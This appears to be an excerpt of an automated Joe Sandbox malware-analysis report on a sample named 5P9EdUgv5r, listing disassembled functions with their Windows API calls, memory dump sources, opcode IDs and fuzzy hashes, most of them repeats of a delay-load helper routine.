                                • Instruction Fuzzy Hash: 6ED0A73121820C7ADF50BA748C13A7AFBA8DB04310F00C065BC0CC6141FD71DE10A671
                                Function 00D69989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                • GetFileType.KERNELBASE(000000FF,00D69887), ref: 00D69995
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileType
                                • String ID:
                                • API String ID: 3081899298-0
                                • Opcode ID: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                                • Instruction ID: f0930f5cb171996b8e9868c7f61c8344196abb386d7d4f61f3e42bd474ce8007
                                • Opcode Fuzzy Hash: 7da1f3bba73b06e636cf38f669ffe530bdc6ba971ab68dd5d725faf2a147da90
                                • Instruction Fuzzy Hash: 64D01231011280978F394A344D19099B755DB83366B3CE6AAD025C40A1D733C803F961
                                Function 00D7D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D7D43F
                                  • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                  • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                  • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                  • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                                  • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                • String ID:
                                • API String ID: 897784432-0
                                • Opcode ID: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                                • Instruction ID: 43f9f5c236e4ce10a5ba1955825b7aa473c18cce8705a94b307421d9470d12ce
                                • Opcode Fuzzy Hash: 9e4d44fcaaf59a4fc2677b7a9f9bca4a899698e8f389f7ceb36f18536383ff7c
                                • Instruction Fuzzy Hash: 3AD09E31144301BBD6162B51DE06F1F7AA6EB88B04F004554B348B40B1C6A29D30AB36
                                Function 00D7D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                                • Instruction ID: faeed1a487a1b297fa3498ee99b62c840150134575a9eaa62191df963a14e128
                                • Opcode Fuzzy Hash: 17097ca10dccfe11fb623aab123b3a662397ae45425a9c9116f9a5d4fb46c0e7
                                • Instruction Fuzzy Hash: AEB012A226C2026C320871047D03E36162DCCC1B20330C01FF48FD12C0F4409C084432
                                Function 00D7D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                                • Instruction ID: 4f28a45d7a2a12902ed40103cdbc38f29fdb41ba3d523e016dad58509c972a62
                                • Opcode Fuzzy Hash: f56e9e033de43fd96e1dc6f890bc2a6322e0d126cb7b80068437285263e7c648
                                • Instruction Fuzzy Hash: 42B0129126C2426C324871047D03E36162DCCC0B20331C12FF04FD13C0F4409C8D4432
                                Function 00D7D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                                • Instruction ID: 5d01a11d8a0657f36c2dce196977f95d1f688d47d49c332676c7b8f24810f488
                                • Opcode Fuzzy Hash: b18906f7455baac357f4644615b6aebce14c0091c9de7d2c55a2629332b2fcd7
                                • Instruction Fuzzy Hash: B0B0129126C1026C320C75057E03E36162DCCC0B20330C02FF04FD13C0F4809C0E5432
                                Function 00D7D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                                • Instruction ID: 68eb83d5e7565c800cf5e8088429162ee19d4a19986f0fa5096090b59dcfe65f
                                • Opcode Fuzzy Hash: 77b49763e4ff6b6cdb2603ac421ec8b2300cebbf90faaa01aaa41ba5ea70bb7e
                                • Instruction Fuzzy Hash: 02B012A126C1026C320C71057E03E36162DCCC0B20330C01FF08FD12C0F4809D094432
                                Function 00D7D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                                • Instruction ID: d5d31441835687fb5679566ff4d3971041bf051fbbe8b41ce962af2e07917c9c
                                • Opcode Fuzzy Hash: 1a5a1117fa207f62043195f72682d3c70caad2e6159f44d9c8ccd54bfb3c252a
                                • Instruction Fuzzy Hash: 03B012A126C1026C320C71057D03E36162DCCC0B20330C01FF08FD12C0F8409C084432
                                Function 00D7D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                                • Instruction ID: abd5154eb1e5548aa04dce0be0428ec3a944ee08fc25e9a8e47234088a1d87db
                                • Opcode Fuzzy Hash: ddfd1637e0c781a85ff400d2b926c9127d77548f10d4b976e990d881a56b89de
                                • Instruction Fuzzy Hash: 2BB012A126C2026C324871047D03E36162DCCC0B20331C11FF08FD12C0F4409C484432
                                Function 00D7D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                                • Instruction ID: b96fd5a7f21dfa1979fd2f99a04b456529428e819934c253f74d15c9578c5aac
                                • Opcode Fuzzy Hash: 3f2d0fb9711d414725142abe6fc6fc5930a981a6ae6c3e2fbd51e10e1cc167d5
                                • Instruction Fuzzy Hash: 07B0929526C3026C260821406952D3B1629CC80B20321852EB04EA0180A4409C488432
                                Function 00D7D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                                • Instruction ID: 1aa383e5ba1583b737f6d686500e1192c5f2bc71b158ffc437c744dae50fd8df
                                • Opcode Fuzzy Hash: eb6409b9d2c68d991b6ee8d991fa645f27f6131135510094cc9c89479ae6a02f
                                • Instruction Fuzzy Hash: 8DB0129126C2026C320875047D03E36162DCCC1B20330C02FF44FD13C0F4409C0D4432
                                Function 00D7D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                                • Instruction ID: ed04698555ac8498363a9f36f00b6475b9730dcf226ca70eb29901dcf4e718dc
                                • Opcode Fuzzy Hash: 63918c3bd8acddcb8cec0eb48d184d76853c9b3a1261ecf16f3517ee4aca986d
                                • Instruction Fuzzy Hash: 79B012D526C2026C320871447D43E3B162DDCC0B20330C01FF04FD12C0F8409C084532
                                Function 00D7D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                                • Instruction ID: 5dbc42b1651a11e6094f917cce065cd6688fbb72237c0aacbb0f3dbbc3b22480
                                • Opcode Fuzzy Hash: a0fcdc4a00daa29cd72322474a8158eefd96676871ed02236011024222746058
                                • Instruction Fuzzy Hash: 62B012E126C1026C320D71057E03E3616BDCCC0B20330C01FF04FD12C0F4809C094432
                                Function 00D7D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                                • Instruction ID: 648a6bee2e9b95081b5a03cb6fa027a41c7734b59f722e6b19be2b353195a887
                                • Opcode Fuzzy Hash: 7e1abbff093cfe63799c5e4351ac1e56b69087ca541d739879e9570221146738
                                • Instruction Fuzzy Hash: E1B012A126D6026C324872047D03E36162FCCC0B20331C11FF04FD12C0F440DC484432
                                Function 00D7D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                                • Instruction ID: 8d776ac90ff0905748a87bfc75feb013670f7c19dc6288f3508f7098a24ab319
                                • Opcode Fuzzy Hash: 386bc4ebab6fb8b22d129ace31fa979e3def5666945df5506ada3c0b1fe65056
                                • Instruction Fuzzy Hash: 20B012912AD6026C320871047D03E36162FCCC1B20330C01FF44FD12C0F4409C084432
                                Function 00D7D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                                • Instruction ID: 9838c794a9f57ae96aca407e6f504d79c79cdb00d7d181d130788accd0cc9a3d
                                • Opcode Fuzzy Hash: 094a949b57e6f6a48b76f49e1d38594f444a5bef3f3e8e4b1cefe4525b525101
                                • Instruction Fuzzy Hash: BBB0129127D9026C320871047D03E36166FCCC0B20330C01FF04FD12C0F8409C084432
                                Function 00D7D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
